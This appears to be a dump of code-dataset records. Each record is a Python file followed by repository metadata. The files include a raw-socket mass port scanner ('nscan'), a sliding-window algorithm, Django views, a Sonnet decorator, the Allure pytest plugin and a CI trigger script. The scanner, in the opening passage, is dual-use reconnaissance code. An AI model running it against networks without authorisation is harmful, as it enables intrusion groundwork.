fromlist=[NSCRIPT_PATH]) t = threading.Thread(target=s.run, args=(q, self.event)) self.thread.append(t) t.setDaemon(True) t.start() self.queues[script] = q def Feed(self, host, port): for scr in self.imports: for r in self.imports[scr]: if port in xrange(r[0], r[1]): self.queues[scr].put((host, port)) break def Cleanup(self): while Alive(self.thread): time.sleep(10) class nscan(object): def __init__(self, options): self.options = options self.hosts = self.split(options.hosts, options.threads) self.ports = options.ports self.srcp = random.randint(1, 65535)#self.PickPort() # source port self.smac = options.smac self.dmac = options.dmac self.ifname = options.ifname self.siface = options.siface self.diface = options.diface self.banner = options.banner self.count = options.count self.cooldown = options.cooldown self.queue = Queue.Queue() if options.stype.upper()=='U': self.stype = socket.IPPROTO_UDP else: self.stype = socket.IPPROTO_TCP self.events = { 'send': threading.Event(), 'recv': threading.Event()} self.threads = { 'send': [], 'recv': None} def __Transport(self, src, dst=0): if self.stype==socket.IPPROTO_TCP: transport = tcp.TCP(src, dst) transport.seqn = 0xDEADC0DE else: transport = udp.UDP(src, dst) return transport def __Pack(self, transport, src, dst): if self.stype==socket.IPPROTO_TCP: transport.payload = '' else: transport.payload = PAYLOAD.get(transport.dstp, '\x00\r\n\r\n') packed = transport.pack(src, dst) return packed + transport.payload def __CookieCheck(self, data): check = False dstp = struct.unpack('!H', data[22:24])[0] if self.stype==socket.IPPROTO_UDP: if dstp==self.srcp: check = True else: ackn = struct.unpack('!L', data[28:32])[0] flags = struct.unpack('B', data[33])[0] & 0b010010 # SYN-ACK if dstp==self.srcp and ackn==0xDEADC0DF and flags==18: check = True return check def init(self): generators = [] for h in self.hosts: g = Generator(h[1]-h[0]) generators.append(g) t = threading.Thread(target=self.send, args=(h, self.srcp, g)) t.setDaemon(True) self.threads['send'].append(t) t = threading.Thread(target=self.recv) t.setDaemon(True) self.threads['recv'] = t if 'resume' in dir(self.options): i = 0 for g in generators: g.resume(*self.options.indexes[i]) i+=1 return self.threads, self.events, self.queue, generators def run(self): self.events['send'].set() self.events['recv'].set() for t in self.threads['send']: t.start() self.threads['recv'].start() def send(self, hosts, srcp, gen): if 'ppp' in self.ifname: family = socket.AF_INET proto = socket.IPPROTO_RAW eth = '' else: family = socket.AF_PACKET proto = ETH_P_IP eth = ethernet.ETHER(mac2byte(self.smac), mac2byte(self.dmac), ETH_P_IP).pack() sock = socket.socket(family, socket.SOCK_RAW, proto) transport = self.__Transport(srcp, 0) npacket = 0 self.events['send'].wait() target = hosts[0] while self.events['send'].isSet(): try: target = hosts[0] + gen.next() iph = ip.IP(self.diface, dec2dot(target), self.stype) except StopIteration: break for port_list in self.ports: for port in range(port_list[0], port_list[1]): if self.events['send'].isSet(): transport.dstp = port packet = eth + iph.pack() + self.__Pack(transport, iph.src, iph.dst) #tcph.pack(iph.src, iph.dst) sock.sendto(packet, (dec2dot(target), 0)) # self.ifname npacket+=1 if not npacket%self.cooldown[0]: time.sleep(self.cooldown[1]) else: break logging.info('[SEND] Sent: {} packets'.format(npacket)) sock.close() def recv(self): sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, self.stype) sock.bind(('', self.srcp)) sock.settimeout(5) self.events['recv'].wait() counter = 0 while self.events['recv'].isSet(): try: data, sa_ll = sock.recvfrom(65535) if self.__CookieCheck(data): self.queue.put(Extract(data)) counter += 1 if counter==self.count: self.events['send'].clear() break except socket.timeout: continue sock.close() logging.info('[RECV] Received: {} packets'.format(counter)) def split(self, hosts, n): ''' Split host range into n parts (multithreaded) ''' nhosts = hosts[1] - hosts[0] # number of hosts nparts = nhosts/n + 1 host_parts = [] start = hosts[0] while True: if len(host_parts)<n-1: end = start + nparts host_parts.append((start, end)) start = end else: host_parts.append((start, hosts[1])) break return host_parts def PickPort(self): while True: srcp = random.randrange(10000, 65535) if srcp not in self.sport: self.sport.append(srcp) break return srcp def Extract(packet): src = socket.inet_ntoa(packet[12:16]) srcp = struct.unpack('!H', packet[20:22])[0] return src, srcp def Alive(thread_list): ''' check if thread is alive ''' alive = False for t in thread_list: if t.isAlive(): alive = True break return alive
28.228346
103
0.64728
1,066
7,170
4.287993
0.246717
0.021877
0.014439
0.024065
0.0676
0.02144
0.015751
0
0
0
0
0.043843
0.201534
7,170
253
104
28.339921
0.754585
0.037378
0
0.136929
0
0.016598
0.074129
0.040153
0
0
0.004707
0
0
0
null
null
0
0.062241
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc992600a7f421e186b8dbe2ed6b420847313d4c
1,473
py
Python
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
python/patterns/slidingwindow/longest_substring_no_repeating_char.py
dharmik-thakkar/dsapatterns
fc5890a86c5d49097b73b6afd14e1a4e81cff7a0
[ "Apache-2.0" ]
null
null
null
####################################################################################################################### # Given a string, find the length of the longest substring which has no repeating characters. # # Input: String="aabccbb" # Output: 3 # Explanation: The longest substring without any repeating characters is "abc". # # Input: String="abbbb" # Output: 2 # Explanation: The longest substring without any repeating characters is "ab". # # Input: String="abccde" # Output: 3 # Explanation: Longest substrings without any repeating characters are "abc" & "cde". ####################################################################################################################### def longest_substring_no_repeating_char(input_str: str) -> int: window_start = 0 is_present = [None for i in range(26)] max_window = 0 for i in range(len(input_str)): char_ord = ord(input_str[i]) - 97 if is_present[char_ord] is not None: window_start = max(window_start, is_present[char_ord] + 1) is_present[char_ord] = i max_window = max(max_window, i - window_start + 1) return max_window print(longest_substring_no_repeating_char('aabccbb')) print(longest_substring_no_repeating_char('abbbb')) print(longest_substring_no_repeating_char('abccde')) print(longest_substring_no_repeating_char('abcabcbb')) print(longest_substring_no_repeating_char('bbbbb')) print(longest_substring_no_repeating_char('pwwkew'))
40.916667
119
0.620502
175
1,473
4.954286
0.32
0.184544
0.145329
0.217993
0.425606
0.38985
0.140715
0.140715
0.140715
0
0
0.008621
0.133741
1,473
35
120
42.085714
0.670846
0.291242
0
0
0
0
0.046717
0
0
0
0
0
0
1
0.058824
false
0
0
0
0.117647
0.352941
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc9e5fe1655adc75064f69de338759361c073b11
2,563
py
Python
core/views.py
tweeprint/api.tweeprint.com
248525f2cffffb20765e7eca1e7a63f359adfc1b
[ "MIT" ]
1
2021-03-15T07:24:10.000Z
2021-03-15T07:24:10.000Z
core/views.py
tweeprint/api.tweeprint.com
248525f2cffffb20765e7eca1e7a63f359adfc1b
[ "MIT" ]
1
2021-04-11T01:22:24.000Z
2021-04-11T01:22:24.000Z
core/views.py
tweeprint/api.tweeprint.com
248525f2cffffb20765e7eca1e7a63f359adfc1b
[ "MIT" ]
null
null
null
import requests import django.contrib.auth as auth from django.shortcuts import render, redirect, get_object_or_404 from django.http import HttpResponse, JsonResponse, Http404 from django.contrib.auth.decorators import login_required from django.core.serializers import serialize from core.serializers import * from core.models import * from core.secrets import API_TOKEN, STRIPE_API_KEY import json from django.views.decorators.csrf import csrf_exempt from django.shortcuts import get_object_or_404 def get_category(request, category): category = serialize('json', Tweeprint.objects.filter(category_slug=category), fields=('id', 'date_added', 'link', 'tweet_id', 'tweet_json', 'score', 'category', 'category_slug')) return HttpResponse(category, content_type="application/json") def get_categories(request): categories = [t[0] for t in Tweeprint.CHOICES] if request.method == 'GET': return JsonResponse(categories, safe=False) def get_used_categories(request): used_categories = {t.category_slug: {'category': t.category, 'slug': t.category_slug} for t in Tweeprint.objects.all()}.values() if request.method == 'GET': return JsonResponse(list(used_categories), safe=False) def get_tweeprints(request): if request.method == 'GET': tweeprints = serialize('json', Tweeprint.objects.all(), fields=('id', 'date_added', 'link', 'tweet_id', 'tweet_json', 'score', 'category', 'category_slug')) return HttpResponse(tweeprints, content_type="application/json") def get_most_recent(request): if request.method == 'GET': tweeprints = serialize('json', Tweeprint.objects.all().order_by('-date_added'), fields=('id', 'date_added', 'link', 'tweet_id', 'tweet_json', 'score', 'category', 'category_slug')) return HttpResponse(tweeprints, content_type="application/json") def get_most_popular(request): if request.method == 'GET': tweeprints = serialize('json', Tweeprint.objects.all().order_by('-score'), fields=('id', 'date_added', 'link', 'tweet_id', 'tweet_json', 'score', 'category', 'category_slug')) return HttpResponse(tweeprints, content_type="application/json") @csrf_exempt def submit(request): if request.method == 'POST': form = request.body json_data = json.loads(request.body) try: tweeprint = Tweeprint.objects.create(link=str(json_data['link']), category=json_data['category']) except Exception as e: print(e) return HttpResponse('Submitted!') return HttpResponse("POST not made")
46.6
188
0.717909
321
2,563
5.570093
0.274143
0.053691
0.050336
0.050336
0.456935
0.428971
0.370805
0.370805
0.370805
0.370805
0
0.00457
0.146313
2,563
55
189
46.6
0.812614
0
0
0.173913
0
0
0.157176
0
0
0
0
0
0
1
0.152174
false
0
0.26087
0
0.586957
0.26087
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
5d7e286fce65b02bbb505a551034d0638886042d
2,764
py
Python
sonnet/src/once.py
ScriptBox99/deepmind-sonnet
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
[ "Apache-2.0" ]
10,287
2017-04-07T12:33:37.000Z
2022-03-30T03:32:16.000Z
sonnet/src/once.py
ScriptBox99/deepmind-sonnet
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
[ "Apache-2.0" ]
209
2017-04-07T15:57:11.000Z
2022-03-27T10:43:03.000Z
sonnet/src/once.py
ScriptBox99/deepmind-sonnet
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
[ "Apache-2.0" ]
1,563
2017-04-07T13:15:06.000Z
2022-03-29T15:26:04.000Z
# Copyright 2019 The Sonnet Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Utility to run functions and methods once.""" import uuid from sonnet.src import utils _ONCE_PROPERTY = "_snt_once" def _check_no_output(output): if output is not None: raise ValueError("@snt.once decorated functions cannot return values") def once(f): """Decorator which ensures a wrapped method is only ever run once. >>> @snt.once ... def f(): ... print('Hello, world!') >>> f() Hello, world! >>> f() >>> f() If `f` is a method then it will be evaluated once per instance: >>> class MyObject: ... @snt.once ... def f(self): ... print('Hello, world!') >>> o = MyObject() >>> o.f() Hello, world! >>> o.f() >>> o2 = MyObject() >>> o2.f() Hello, world! >>> o.f() >>> o2.f() If an error is raised during execution of `f` it will be raised to the user. Next time the method is run, it will be treated as not having run before. Args: f: A function to wrap which should only be called once. Returns: Wrapped version of `f` which will only evaluate `f` the first time it is called. """ # TODO(tomhennigan) Perhaps some more human friendly identifier? once_id = uuid.uuid4() @utils.decorator def wrapper(wrapped, instance, args, kwargs): """Decorator which ensures a wrapped method is only ever run once.""" if instance is None: # NOTE: We can't use the weakset since you can't weakref None. if not wrapper.seen_none: _check_no_output(wrapped(*args, **kwargs)) wrapper.seen_none = True return # Get or set the `seen` set for this object. seen = getattr(instance, _ONCE_PROPERTY, None) if seen is None: seen = set() setattr(instance, _ONCE_PROPERTY, seen) if once_id not in seen: _check_no_output(wrapped(*args, **kwargs)) seen.add(once_id) wrapper.seen_none = False decorated = wrapper(f) # pylint: disable=no-value-for-parameter,assignment-from-none decorated.__snt_once_wrapped__ = f return decorated
28.494845
87
0.634949
386
2,764
4.471503
0.42487
0.034762
0.017381
0.01854
0.112399
0.112399
0.060255
0.060255
0.060255
0.060255
0
0.005682
0.23589
2,764
96
88
28.791667
0.811553
0.655933
0
0.076923
0
0
0.068685
0
0
0
0
0.010417
0
1
0.115385
false
0
0.076923
0
0.269231
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
5d8772d2443bc37d077b4e1088b8652b560de433
387
py
Python
Python/Numpy/Min and Max/min_and_max.py
brianchiang-tw/HackerRank
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
[ "MIT" ]
2
2020-05-28T07:15:00.000Z
2020-07-21T08:34:06.000Z
Python/Numpy/Min and Max/min_and_max.py
brianchiang-tw/HackerRank
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
[ "MIT" ]
null
null
null
Python/Numpy/Min and Max/min_and_max.py
brianchiang-tw/HackerRank
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
[ "MIT" ]
null
null
null
import numpy as np if __name__ == '__main__': h, w = map( int, input().split() ) row_list = [] for i in range(h): single_row = list( map(int, input().split() ) ) np_row = np.array( single_row ) row_list.append( np_row ) min_of_each_row = np.min( row_list, axis = 1) max_of_min = np.max( min_of_each_row ) print( max_of_min )
15.48
56
0.573643
61
387
3.229508
0.47541
0.142132
0.111675
0.162437
0
0
0
0
0
0
0
0.003663
0.294574
387
24
57
16.125
0.717949
0
0
0
0
0
0.020779
0
0
0
0
0
0
1
0
false
0
0.090909
0
0.090909
0.090909
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5d87b775f0d8dfc2c8f2bb9538693bb8aa0d1ec6
22,757
py
Python
allure/pytest_plugin.py
allure-framework/allure-pytest
d55180aaeb21233e7ca577ffc6f67a07837c63f2
[ "Apache-2.0" ]
112
2017-01-24T21:37:49.000Z
2022-03-25T22:32:12.000Z
venv/Lib/site-packages/allure/pytest_plugin.py
Arthii01052/conduit
3427d76d0fa364cb5d19bdd6da4aeb0a22fe9660
[ "MIT" ]
56
2017-01-21T20:01:41.000Z
2019-01-14T13:35:53.000Z
venv/Lib/site-packages/allure/pytest_plugin.py
Arthii01052/conduit
3427d76d0fa364cb5d19bdd6da4aeb0a22fe9660
[ "MIT" ]
52
2017-01-23T13:40:40.000Z
2022-03-30T00:02:31.000Z
import uuid import pickle import pytest import argparse from collections import namedtuple from six import text_type from allure.common import AllureImpl, StepContext from allure.constants import Status, AttachmentType, Severity, \ FAILED_STATUSES, Label, SKIPPED_STATUSES from allure.utils import parent_module, parent_down_from_module, labels_of, \ all_of, get_exception_message, now, mangle_testnames from allure.structure import TestCase, TestStep, Attach, TestSuite, Failure, TestLabel def pytest_addoption(parser): parser.getgroup("reporting").addoption('--alluredir', action="store", dest="allurereportdir", metavar="DIR", default=None, help="Generate Allure report in the specified directory (may not exist)") severities = [v for (_, v) in all_of(Severity)] def label_type(name, legal_values=set()): """ argparse-type factory for labelish things. processed value is set of tuples (name, value). :param name: of label type (for future TestLabel things) :param legal_values: a `set` of values that are legal for this label, if any limit whatsoever :raises ArgumentTypeError: if `legal_values` are given and there are values that fall out of that """ def a_label_type(string): atoms = set(string.split(',')) if legal_values and not atoms < legal_values: raise argparse.ArgumentTypeError('Illegal {} values: {}, only [{}] are allowed'.format(name, ', '.join(atoms - legal_values), ', '.join(legal_values))) return set((name, v) for v in atoms) return a_label_type parser.getgroup("general").addoption('--allure_severities', action="store", dest="allureseverities", metavar="SEVERITIES_SET", default={}, type=label_type(name=Label.SEVERITY, legal_values=set(severities)), help="""Comma-separated list of severity names. Tests only with these severities will be run. Possible values are:%s.""" % ', '.join(severities)) parser.getgroup("general").addoption('--allure_features', action="store", dest="allurefeatures", metavar="FEATURES_SET", default={}, type=label_type(name=Label.FEATURE), help="""Comma-separated list of feature names. Run tests that have at least one of the specified feature labels.""") parser.getgroup("general").addoption('--allure_stories', action="store", dest="allurestories", metavar="STORIES_SET", default={}, type=label_type(name=Label.STORY), help="""Comma-separated list of story names. Run tests that have at least one of the specified story labels.""") def pytest_configure(config): reportdir = config.option.allurereportdir if reportdir: # we actually record something allure_impl = AllureImpl(reportdir) testlistener = AllureTestListener(config) pytest.allure._allurelistener = testlistener config.pluginmanager.register(testlistener) if not hasattr(config, 'slaveinput'): # on xdist-master node do all the important stuff config.pluginmanager.register(AllureAgregatingListener(allure_impl, config)) config.pluginmanager.register(AllureCollectionListener(allure_impl)) class AllureTestListener(object): """ Per-test listener. Is responsible for recording in-test data and for attaching it to the test report thing. The per-test reports are handled by `AllureAgregatingListener` at the `pytest_runtest_logreport` hook. """ def __init__(self, config): self.config = config self.environment = {} self.test = None # FIXME: that flag makes us pre-report failures in the makereport hook. # it is here to cope with xdist's begavior regarding -x. # see self.pytest_runtest_makereport and AllureAgregatingListener.pytest_sessionfinish self._magicaldoublereport = hasattr(self.config, 'slaveinput') and self.config.getvalue("maxfail") @pytest.mark.hookwrapper def pytest_runtest_protocol(self, item, nextitem): try: # for common items description = item.function.__doc__ except AttributeError: # for doctests that has no `function` attribute description = item.reportinfo()[2] self.test = TestCase(name='.'.join(mangle_testnames([x.name for x in parent_down_from_module(item)])), description=description, start=now(), attachments=[], labels=labels_of(item), status=None, steps=[], id=str(uuid.uuid4())) # for later resolution in AllureAgregatingListener.pytest_sessionfinish self.stack = [self.test] yield self.test = None self.stack = [] def attach(self, title, contents, attach_type): """ Store attachment object in current state for later actual write in the `AllureAgregatingListener.write_attach` """ attach = Attach(source=contents, # we later re-save those, oh my... title=title, type=attach_type) self.stack[-1].attachments.append(attach) def dynamic_issue(self, *issues): """ Attaches ``issues`` to the current active case """ if self.test: self.test.labels.extend([TestLabel(name=Label.ISSUE, value=issue) for issue in issues]) def description(self, description): """ Sets description for the test """ if self.test: self.test.description = description def start_step(self, name): """ Starts an new :py:class:`allure.structure.TestStep` with given ``name``, pushes it to the ``self.stack`` and returns the step. """ step = TestStep(name=name, title=name, start=now(), attachments=[], steps=[]) self.stack[-1].steps.append(step) self.stack.append(step) return step def stop_step(self): """ Stops the step at the top of ``self.stack`` """ step = self.stack.pop() step.stop = now() def _fill_case(self, report, call, pyteststatus, status): """ Finalizes with important data :param report: py.test's `TestReport` :param call: py.test's `CallInfo` :param pyteststatus: the failed/xfailed/xpassed thing :param status: a :py:class:`allure.constants.Status` entry """ [self.attach(name, contents, AttachmentType.TEXT) for (name, contents) in dict(report.sections).items()] self.test.stop = now() self.test.status = status if status in FAILED_STATUSES: self.test.failure = Failure(message=get_exception_message(call.excinfo, pyteststatus, report), trace=report.longrepr or hasattr(report, 'wasxfail') and report.wasxfail) elif status in SKIPPED_STATUSES: skip_message = type(report.longrepr) == tuple and report.longrepr[2] or report.wasxfail trim_msg_len = 89 short_message = skip_message.split('\n')[0][:trim_msg_len] # FIXME: see pytest.runner.pytest_runtest_makereport self.test.failure = Failure(message=(short_message + '...' * (len(skip_message) > trim_msg_len)), trace=status == Status.PENDING and report.longrepr or short_message != skip_message and skip_message or '') def report_case(self, item, report): """ Adds `self.test` to the `report` in a `AllureAggegatingListener`-understood way """ parent = parent_module(item) # we attach a four-tuple: (test module ID, test module name, test module doc, environment, TestCase) report.__dict__.update(_allure_result=pickle.dumps((parent.nodeid, parent.module.__name__, parent.module.__doc__ or '', self.environment, self.test))) @pytest.mark.hookwrapper def pytest_runtest_makereport(self, item, call): """ Decides when to actually report things. pytest runs this (naturally) three times -- with report.when being: setup <--- fixtures are to be initialized in this one call <--- when this finishes the main code has finished teardown <--- tears down fixtures (that still possess important info) `setup` and `teardown` are always called, but `call` is called only if `setup` passes. See :py:func:`_pytest.runner.runtestprotocol` for proofs / ideas. The "other side" (AllureAggregatingListener) expects us to send EXACTLY ONE test report (it wont break, but it will duplicate cases in the report -- which is bad. So we work hard to decide exact moment when we call `_stop_case` to do that. This method may benefit from FSM (we keep track of what has already happened via self.test.status) Expected behavior is: FAILED when call fails and others OK BROKEN when either setup OR teardown are broken (and call may be anything) PENDING if skipped and xfailed SKIPPED if skipped and not xfailed """ report = (yield).get_result() status = self.config.hook.pytest_report_teststatus(report=report) status = status and status[0] if report.when == 'call': if report.passed: self._fill_case(report, call, status, Status.PASSED) elif report.failed: self._fill_case(report, call, status, Status.FAILED) # FIXME: this is here only to work around xdist's stupid -x thing when in exits BEFORE THE TEARDOWN test log. Meh, i should file an issue to xdist if self._magicaldoublereport: # to minimize ze impact self.report_case(item, report) elif report.skipped: if hasattr(report, 'wasxfail'): self._fill_case(report, call, status, Status.PENDING) else: self._fill_case(report, call, status, Status.CANCELED) elif report.when == 'setup': # setup / teardown if report.failed: self._fill_case(report, call, status, Status.BROKEN) elif report.skipped: if hasattr(report, 'wasxfail'): self._fill_case(report, call, status, Status.PENDING) else: self._fill_case(report, call, status, Status.CANCELED) elif report.when == 'teardown': # as teardown is always called for testitem -- report our status here if not report.passed: if self.test.status not in FAILED_STATUSES: # if test was OK but failed at teardown => broken self._fill_case(report, call, status, Status.BROKEN) else: # mark it broken so, well, someone has idea of teardown failure # still, that's no big deal -- test has already failed # TODO: think about that once again self.test.status = Status.BROKEN # if a test isn't marked as "unreported" or it has failed, add it to the report. if not item.get_marker("unreported") or self.test.status in FAILED_STATUSES: self.report_case(item, report) def pytest_runtest_setup(item): item_labels = set((l.name, l.value) for l in labels_of(item)) # see label_type arg_labels = set().union(item.config.option.allurefeatures, item.config.option.allurestories, item.config.option.allureseverities) if arg_labels and not item_labels & arg_labels: pytest.skip('Not suitable with selected labels: %s.' % ', '.join(text_type(l) for l in sorted(arg_labels))) class LazyInitStepContext(StepContext): """ This is a step context used for decorated steps. It provides a possibility to create step decorators, being initiated before pytest_configure, when no AllureListener initiated yet. """ def __init__(self, allure_helper, title): self.allure_helper = allure_helper self.title = title self.step = None @property def allure(self): listener = self.allure_helper.get_listener() # if listener has `stack` we are inside a test # record steps only when that # FIXME: this breaks encapsulation a lot if hasattr(listener, 'stack'): return listener class AllureHelper(object): """ This object holds various utility methods used from ``pytest.allure`` namespace, like ``pytest.allure.attach`` """ def __init__(self): self._allurelistener = None # FIXME: this gets injected elsewhere, like in the pytest_configure def get_listener(self): return self._allurelistener def attach(self, name, contents, type=AttachmentType.TEXT): # @ReservedAssignment """ Attaches ``contents`` to a current context with given ``name`` and ``type``. """ if self._allurelistener: self._allurelistener.attach(name, contents, type) def label(self, name, *value): """ A decorator factory that returns ``pytest.mark`` for a given label. """ allure_label = getattr(pytest.mark, '%s.%s' % (Label.DEFAULT, name)) return allure_label(*value) def severity(self, severity): """ A decorator factory that returns ``pytest.mark`` for a given allure ``level``. """ return self.label(Label.SEVERITY, severity) def feature(self, *features): """ A decorator factory that returns ``pytest.mark`` for a given features. """ return self.label(Label.FEATURE, *features) def story(self, *stories): """ A decorator factory that returns ``pytest.mark`` for a given stories. """ return self.label(Label.STORY, *stories) def issue(self, *issues): """ A decorator factory that returns ``pytest.mark`` for a given issues. """ return self.label(Label.ISSUE, *issues) def dynamic_issue(self, *issues): """ Mark test ``issues`` from inside. """ if self._allurelistener: self._allurelistener.dynamic_issue(*issues) def description(self, description): """ Sets description for the test """ if self._allurelistener: self._allurelistener.description(description) def testcase(self, *testcases): """ A decorator factory that returns ``pytest.mark`` for a given testcases. """ return self.label(Label.TESTCASE, *testcases) def step(self, title): """ A contextmanager/decorator for steps. TODO: when moving to python 3, rework this with ``contextlib.ContextDecorator``. Usage examples:: import pytest def test_foo(): with pytest.allure.step('mystep'): assert False @pytest.allure.step('make test data') def make_test_data_bar(): raise ValueError('No data today') def test_bar(): assert make_test_data_bar() @pytest.allure.step def make_test_data_baz(): raise ValueError('No data today') def test_baz(): assert make_test_data_baz() @pytest.fixture() @pytest.allure.step('test fixture') def steppy_fixture(): return 1 def test_baz(steppy_fixture): assert steppy_fixture """ if callable(title): return LazyInitStepContext(self, title.__name__)(title) else: return LazyInitStepContext(self, title) def single_step(self, text): """ Writes single line to report. """ if self._allurelistener: with self.step(text): pass def environment(self, **env_dict): if self._allurelistener: self._allurelistener.environment.update(env_dict) @property def attach_type(self): return AttachmentType @property def severity_level(self): return Severity def __getattr__(self, attr): """ Provides fancy shortcuts for severity:: # these are the same pytest.allure.CRITICAL pytest.allure.severity(pytest.allure.severity_level.CRITICAL) """ if attr in dir(Severity) and not attr.startswith('_'): return self.severity(getattr(Severity, attr)) else: raise AttributeError MASTER_HELPER = AllureHelper() def pytest_namespace(): return {'allure': MASTER_HELPER} class AllureAgregatingListener(object): """ Listens to pytest hooks to generate reports for common tests. """ def __init__(self, impl, config): self.impl = impl # module's nodeid => TestSuite object self.suites = {} def pytest_sessionfinish(self): """ We are done and have all the results in `self.suites` Lets write em down. But first we kinda-unify the test cases. We expect cases to come from AllureTestListener -- and the have ._id field to manifest their identity. Of all the test cases in suite.testcases we leave LAST with the same ID -- becase logreport can be sent MORE THAN ONE TIME (namely, if the test fails and then gets broken -- to cope with the xdist's -x behavior we have to have tests even at CALL failures) TODO: do it in a better, more efficient way """ for s in self.suites.values(): if s.tests: # nobody likes empty suites s.stop = max(case.stop for case in s.tests) known_ids = set() refined_tests = [] for t in s.tests[::-1]: if t.id not in known_ids: known_ids.add(t.id) refined_tests.append(t) s.tests = refined_tests[::-1] with self.impl._reportfile('%s-testsuite.xml' % uuid.uuid4()) as f: self.impl._write_xml(f, s) self.impl.store_environment() def write_attach(self, attachment): """ Writes attachment object from the `AllureTestListener` to the FS, fixing it fields :param attachment: a :py:class:`allure.structure.Attach` object """ # OMG, that is bad attachment.source = self.impl._save_attach(attachment.source, attachment.type) attachment.type = attachment.type.mime_type def pytest_runtest_logreport(self, report): if hasattr(report, '_allure_result'): module_id, module_name, module_doc, environment, testcase = pickle.loads(report._allure_result) report._allure_result = None # so actual pickled data is garbage-collected, see https://github.com/allure-framework/allure-python/issues/98 self.impl.environment.update(environment) for a in testcase.iter_attachments(): self.write_attach(a) self.suites.setdefault(module_id, TestSuite(name=module_name, description=module_doc, tests=[], labels=[], start=testcase.start, # first case starts the suite! stop=None)).tests.append(testcase) CollectFail = namedtuple('CollectFail', 'name status message trace') class AllureCollectionListener(object): """ Listens to pytest collection-related hooks to generate reports for modules that failed to collect. """ def __init__(self, impl): self.impl = impl self.fails = [] def pytest_collectreport(self, report): if not report.passed: if report.failed: status = Status.BROKEN else: status = Status.CANCELED self.fails.append(CollectFail(name=mangle_testnames(report.nodeid.split("::"))[-1], status=status, message=get_exception_message(None, None, report), trace=report.longrepr)) def pytest_sessionfinish(self): """ Creates a testsuite with collection failures if there were any. """ if self.fails: self.impl.start_suite(name='test_collection_phase', title='Collection phase', description='This is the tests collection phase. Failures are modules that failed to collect.') for fail in self.fails: self.impl.start_case(name=fail.name.split(".")[-1]) self.impl.stop_case(status=fail.status, message=fail.message, trace=fail.trace) self.impl.stop_suite()
39.168675
183
0.572483
2,450
22,757
5.208163
0.215102
0.011285
0.007524
0.011285
0.151567
0.093574
0.087774
0.072414
0.068809
0.061599
0
0.001198
0.339939
22,757
580
184
39.236207
0.848279
0.282287
0
0.189655
0
0
0.074281
0.001379
0
0
0
0.012069
0
1
0.144828
false
0.017241
0.034483
0.013793
0.255172
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
5d8cdce66649554dda1ee6deb1afd812b2f3ebbf
2,146
py
Python
app.py
duckm8795/runscope-circleci
2fd42e64bddb4b8f34c437c2d834b92369c9a2bf
[ "Apache-2.0" ]
null
null
null
app.py
duckm8795/runscope-circleci
2fd42e64bddb4b8f34c437c2d834b92369c9a2bf
[ "Apache-2.0" ]
null
null
null
app.py
duckm8795/runscope-circleci
2fd42e64bddb4b8f34c437c2d834b92369c9a2bf
[ "Apache-2.0" ]
null
null
null
import requests import sys import time import os def main(): trigger_url = sys.argv[1] trigger_resp = requests.get(trigger_url) if trigger_resp.ok: trigger_json = trigger_resp.json().get("data", {}) test_runs = trigger_json.get("runs", []) print ("Started {} test runs.".format(len(test_runs))) results = {} while len(results.keys()) < len(test_runs): time.sleep(1) for run in test_runs: test_run_id = run.get("test_run_id") if not test_run_id in results: result = _get_result(run) if result.get("result") in ["pass", "fail"]: results[test_run_id] = result pass_count = sum([r.get("result") == "pass" for r in results.values()]) fail_count = sum([r.get("result") == "fail" for r in results.values()]) if fail_count > 0: print ("{} test runs passed. {} test runs failed.".format(pass_count, fail_count)) exit(1) print ("All test runs passed.") def _get_result(test_run): # generate Personal Access Token at https://www.runscope.com/applications if not "RUNSCOPE_ACCESS_TOKEN" in os.environ: print ("Please set the environment variable RUNSCOPE_ACCESS_TOKEN. You can get an access token by going to https://www.runscope.com/applications") exit(1) API_TOKEN = os.environ["RUNSCOPE_ACCESS_TOKEN"] opts = { "base_url": "https://api.runscope.com", "bucket_key": test_run.get("bucket_key"), "test_id": test_run.get("test_id"), "test_run_id": test_run.get("test_run_id") } result_url = "{base_url}/buckets/{bucket_key}/tests/{test_id}/results/{test_run_id}".format(**opts) print ("Getting result: {}".format(result_url)) headers = { "Authorization": "Bearer {}".format(API_TOKEN), "User-Agent": "python-trigger-sample" } result_resp = requests.get(result_url, headers=headers) if result_resp.ok: return result_resp.json().get("data") return None if __name__ == '__main__': main()
31.101449
154
0.605312
282
2,146
4.365248
0.297872
0.062551
0.051178
0.02437
0.152721
0
0
0
0
0
0
0.003137
0.257223
2,146
69
155
31.101449
0.769134
0.033085
0
0.040816
0
0.020408
0.267117
0.074253
0
0
0
0
0
1
